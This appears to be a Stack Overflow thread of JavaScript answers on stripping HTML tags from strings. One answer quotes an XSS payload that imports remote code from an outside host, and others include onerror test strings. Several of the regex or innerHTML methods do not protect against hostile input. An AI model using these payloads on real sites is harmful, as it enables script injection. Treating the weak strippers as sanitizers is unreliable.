Reputation: 17581
How to strip off HTML tags from a string using plain JavaScript only, not using a library?
Upvotes: 868
Views: 939863
Reputation: 2402
This should do the work on any Javascript environment (NodeJS included).
const text = `
<html lang="en">
<head>
<style type="text/css">*{color:red}</style>
<script>alert('hello')</script>
</head>
<body><b>This is some text</b><br/><body>
</html>`;
// Remove style tags and content
text.replace(/<style[^>]*>.*<\/style>/g, '')
// Remove script tags and content
.replace(/<script[^>]*>.*<\/script>/g, '')
// Remove all opening, closing and orphan HTML tags
.replace(/<[^>]+>/g, '')
// Remove leading spaces and repeated CR/LF
.replace(/([\r\n]+ +)+/g, '');
Upvotes: 37
Reputation: 175
To add to the DOMParser solution. Our team found that it was still possible to inject malicious script using the basic solution.
\"><script>document.write('<img src=//X55.is onload=import(src)>');</script>'
\"><script>document.write('\"><script>document.write('\"><img src=//X55.is onload=import(src)>');</script>');</script>
We found that it was best to parse it recursively if any tags still exist after the initial parse.
function stripHTML(str) {
const parsedHTML = new DOMParser().parseFromString(str, "text/html");
const text = parsedHTML.body.textContent;
if (/(<([^>]+)>)/gi.test(text)) {
return stripHTML(text);
}
return text || "";
}
Upvotes: 3
Reputation: 1252
Additionally if you want to strip the html from a string and preserve the break lines, you can use this:
function stripHTML(string)(
let doc = new DOMParser().parseFromString(string, 'text/html');
let textLines = [];
doc.body.childNodes.forEach((childNode) => {
textLines.push(childNode.textContent || '');
})
let result = textLines.join('<br>');
return result;
)
Upvotes: 0
Reputation: 5262
I would like to share an edited version of the Shog9's approved answer.
As Mike Samuel pointed with a comment, that function can execute inline javascript code.
But Shog9 is right when saying "let the browser do it for you..."
so.. here my edited version, using DOMParser:
function strip(html){
let doc = new DOMParser().parseFromString(html, 'text/html');
return doc.body.textContent || "";
}
here the code to test the inline javascript:
strip("<img onerror='alert(\"could run arbitrary JS here\")' src=bogus>")
Also, it does not request resources on parse (like images)
strip("Just text <img src='https://assets.rbl.ms/4155638/980x.jpg'>")
Upvotes: 321
Reputation: 32472
A very good library would be sanitize-html
which is a pure JavaScript function and it could help in any environment.
My case was on React Native I needed to remove all HTML tags from the given texts. so I created this wrapper function:
import sanitizer from 'sanitize-html';
const textSanitizer = (textWithHTML: string): string =>
sanitizer(textWithHTML, {
allowedTags: [],
});
export default textSanitizer;
Now by using my textSanitizer
, I can have got the pure text contents.
Upvotes: 4
Reputation: 113
You can strip out all the html tags with the following regex: /<(.|\n)*?>/g
Example:
let str = "<font class=\"ClsName\">int[0]</font><font class=\"StrLit\">()</font>";
console.log(str.replace(/<(.|\n)*?>/g, ''));
Output:
int[0]()
Upvotes: 0
Reputation: 441
const htmlParser= new DOMParser().parseFromString("<h6>User<p>name</p></h6>" , 'text/html');
const textString= htmlParser.body.textContent;
console.log(textString)
Upvotes: 9
Reputation: 49182
const strip=(text) =>{
return (new DOMParser()?.parseFromString(text,"text/html"))
?.body?.textContent
}
const value=document.getElementById("idOfEl").value
const cleanText=strip(value)
Upvotes: 2
Reputation: 965
As others suggested, I recommend using DOMParser
when possible.
However, if you happen to be working inside a Node/JS Lambda or otherwise DOMParser
is not available, I came up with the regex below to match most of the scenarios mentioned in previous answers/comments. It doesn't match $gt;
and $lt;
as some others may have a concern about, but should capture pretty much any other scenario.
const dangerousText = '?';
const htmlTagRegex = /<\/?([a-zA-Z]\s?)*?([a-zA-Z]+?=\s?".*")*?([\s/]*?)>/gi;
const sanitizedText = dangerousText.replace(htmlTagRegex, '');
This might be easy to simplify, but it should work for most situations. Hope it helps someone.
Upvotes: 1
Reputation: 768
const getTextFromHtml = (t) =>
t
?.split('>')
?.map((i) => i.split('<')[0])
.filter((i) => !i.includes('=') && i.trim())
.join('');
const test = '<p>This <strong>one</strong> <em>time</em>,</p><br /><blockquote>I went to</blockquote><ul><li>band <a href="https://workingclasshistory.com" rel="noopener noreferrer" target="_blank">camp</a>…</li></ul><p>I edited this as a reviewer just to double check</p>'
getTextFromHtml(test)
// 'This onetime,I went toband camp…I edited this as a reviewer just to double check'
Upvotes: 1
Reputation: 44700
It is also possible to use the fantastic htmlparser2 pure JS HTML parser. Here is a working demo:
var htmlparser = require('htmlparser2');
var body = '<p><div>This is </div>a <span>simple </span> <img src="test"></img>example.</p>';
var result = [];
var parser = new htmlparser.Parser({
ontext: function(text){
result.push(text);
}
}, {decodeEntities: true});
parser.write(body);
parser.end();
result.join('');
The output will be This is a simple example.
See it in action here: https://tonicdev.com/jfahrenkrug/extract-text-from-html
This works in both node and the browser if you pack your web application using a tool like webpack.
Upvotes: 6
Reputation: 57482
This package works really well for stripping HTML: https://www.npmjs.com/package/string-strip-html
It works in both the browser and on the server (e.g. Node.js).
Upvotes: 0
Reputation: 1769
If you don't want to create a DOM for this (perhaps you're not in a browser context) you could use the striptags npm package.
import striptags from 'striptags'; //ES6 <-- pick one
const striptags = require('striptags'); //ES5 <-- pick one
striptags('<p>An HTML string</p>');
Upvotes: 2
Reputation: 11
var STR='<Your HTML STRING>''
var HTMLParsedText="";
var resultSet = STR.split('>')
var resultSetLength =resultSet.length
var counter=0
while(resultSetLength>0)
{
if(resultSet[counter].indexOf('<')>0)
{
var value = resultSet[counter];
value=value.substring(0, resultSet[counter].indexOf('<'))
if (resultSet[counter].indexOf('&')>=0 && resultSet[counter].indexOf(';')>=0) {
value=value.replace(value.substring(resultSet[counter].indexOf('&'), resultSet[counter].indexOf(';')+1),'')
}
}
if (value)
{
value = value.trim();
if(HTMLParsedText === "")
{
HTMLParsedText = value;
}
else
{
if (value) {
HTMLParsedText = HTMLParsedText + "\n" + value;
}
}
value='';
}
counter= counter+1;
resultSetLength=resultSetLength-1;
}
console.log(HTMLParsedText);
Upvotes: 0
Reputation: 4518
from CSS tricks:
https://css-tricks.com/snippets/javascript/strip-html-tags-in-javascript/
const originalString = `
<div>
<p>Hey that's <span>somthing</span></p>
</div>
`;
const strippedString = originalString.replace(/(<([^>]+)>)/gi, "");
console.log(strippedString);
Upvotes: 16
Reputation: 1013
As an extension to the jQuery method, if your string might not contain HTML (eg if you are trying to remove HTML from a form field)
jQuery(html).text();
will return an empty string if there is no HTML
Use:
jQuery('<p>' + html + '</p>').text();
instead.
Update:
As has been pointed out in the comments, in some circumstances this solution will execute javascript contained within html
if the value of html
could be influenced by an attacker, use a different solution.
Upvotes: 61
Reputation: 159590
If you're running in a browser, then the easiest way is just to let the browser do it for you...
function stripHtml(html)
{
let tmp = document.createElement("DIV");
tmp.innerHTML = html;
return tmp.textContent || tmp.innerText || "";
}
Note: as folks have noted in the comments, this is best avoided if you don't control the source of the HTML (for example, don't run this on anything that could've come from user input). For those scenarios, you can still let the browser do the work for you - see Saba's answer on using the now widely-available DOMParser.
Upvotes: 916
Reputation: 840
For easier solution, try this => https://css-tricks.com/snippets/javascript/strip-html-tags-in-javascript/
var StrippedString = OriginalString.replace(/(<([^>]+)>)/ig,"");
Upvotes: 6
Reputation: 853
method 1:
function cleanHTML(str){
str.replace(/<(?<=<)(.*?)(?=>)>/g, '<$1>');
}
function uncleanHTML(str){
str.replace(/<(?<=<)(.*?)(?=>)>/g, '<$1>');
}
method 2:
function cleanHTML(str){
str.replace(/</g, '<').replace(/>/g, '>');
}
function uncleanHTML(str){
str.replace(/</g, '<').replace(/>/g, '>');
}
also, don't forget if the user happens to post a math comment (ex: 1 < 2)
, you don't want to strip the whole comment. The browser (only tested chrome) doesn't run unicode as html tags. if you replace all <
with <
everyware in the string, the unicode will display <
as text without running any html. I recommend method 2. jquery also works well $('#element').text();
Upvotes: 0
Reputation: 8721
A safer way to strip the html with jQuery is to first use jQuery.parseHTML to create a DOM, ignoring any scripts, before letting jQuery build an element and then retrieving only the text.
function stripHtml(unsafe) {
return $($.parseHTML(unsafe)).text();
}
Can safely strip html from:
<img src="unknown.gif" onerror="console.log('running injections');">
And other exploits.
nJoy!
Upvotes: 2
Reputation: 1478
https://developer.mozilla.org/en-US/docs/Web/API/Element/insertAdjacentHTML
var div = document.getElementsByTagName('div');
for (var i=0; i<div.length; i++) {
div[i].insertAdjacentHTML('afterend', div[i].innerHTML);
document.body.removeChild(div[i]);
}
Upvotes: 0
Reputation: 1843
An improvement to the accepted answer.
function strip(html)
{
var tmp = document.implementation.createHTMLDocument("New").body;
tmp.innerHTML = html;
return tmp.textContent || tmp.innerText || "";
}
This way something running like this will do no harm:
strip("<img onerror='alert(\"could run arbitrary JS here\")' src=bogus>")
Firefox, Chromium and Explorer 9+ are safe. Opera Presto is still vulnerable. Also images mentioned in the strings are not downloaded in Chromium and Firefox saving http requests.
Upvotes: 37
Reputation: 6764
var text = html.replace(/<\/?("[^"]*"|'[^']*'|[^>])*(>|$)/g, "");
This is a regex version, which is more resilient to malformed HTML, like:
Unclosed tags
Some text <img
"<", ">" inside tag attributes
Some text <img alt="x > y">
Newlines
Some <a
href="http://google.com">
The code
var html = '<br>This <img alt="a>b" \r\n src="a_b.gif" />is > \nmy<>< > <a>"text"</a'
var text = html.replace(/<\/?("[^"]*"|'[^']*'|[^>])*(>|$)/g, "");
Upvotes: 22
Reputation: 672
function strip_html_tags(str)
{
if ((str===null) || (str===''))
return false;
else
str = str.toString();
return str.replace(/<[^>]*>/g, '');
}
Upvotes: -1
Reputation: 170
input
element support only one line text:
The text state represents a one line plain text edit control for the element's value.
function stripHtml(str) {
var tmp = document.createElement('input');
tmp.value = str;
return tmp.value;
}
Update: this works as expected
function stripHtml(str) {
// Remove some tags
str = str.replace(/<[^>]+>/gim, '');
// Remove BB code
str = str.replace(/\[(\w+)[^\]]*](.*?)\[\/\1]/g, '$2 ');
// Remove html and line breaks
const div = document.createElement('div');
div.innerHTML = str;
const input = document.createElement('input');
input.value = div.textContent || div.innerText || '';
return input.value;
}
Upvotes: 1
Reputation: 1423
A lot of people have answered this already, but I thought it might be useful to share the function I wrote that strips HTML tags from a string but allows you to include an array of tags that you do not want stripped. It's pretty short and has been working nicely for me.
function removeTags(string, array){
return array ? string.split("<").filter(function(val){ return f(array, val); }).map(function(val){ return f(array, val); }).join("") : string.split("<").map(function(d){ return d.split(">").pop(); }).join("");
function f(array, value){
return array.map(function(d){ return value.includes(d + ">"); }).indexOf(true) != -1 ? "<" + value : value.split(">")[1];
}
}
var x = "<span><i>Hello</i> <b>world</b>!</span>";
console.log(removeTags(x)); // Hello world!
console.log(removeTags(x, ["span", "i"])); // <span><i>Hello</i> world!</span>
Upvotes: 5
Reputation: 4500
Using Jquery:
function stripTags() {
return $('<p></p>').html(textToEscape).text()
}
Upvotes: 1
Reputation: 1356
For escape characters also this will work using pattern matching:
myString.replace(/((<)|(<)(?:.|\n)*?(>)|(>))/gm, '');
Upvotes: 0
Reputation: 867
If you want to keep the links and the structure of the content (h1, h2, etc) then you should check out TextVersionJS You can use it with any HTML, although it was created to convert an HTML email to plain text.
The usage is very simple. For example in node.js:
var createTextVersion = require("textversionjs");
var yourHtml = "<h1>Your HTML</h1><ul><li>goes</li><li>here.</li></ul>";
var textVersion = createTextVersion(yourHtml);
Or in the browser with pure js:
<script src="textversion.js"></script>
<script>
var yourHtml = "<h1>Your HTML</h1><ul><li>goes</li><li>here.</li></ul>";
var textVersion = createTextVersion(yourHtml);
</script>
It also works with require.js:
define(["textversionjs"], function(createTextVersion) {
var yourHtml = "<h1>Your HTML</h1><ul><li>goes</li><li>here.</li></ul>";
var textVersion = createTextVersion(yourHtml);
});
Upvotes: 7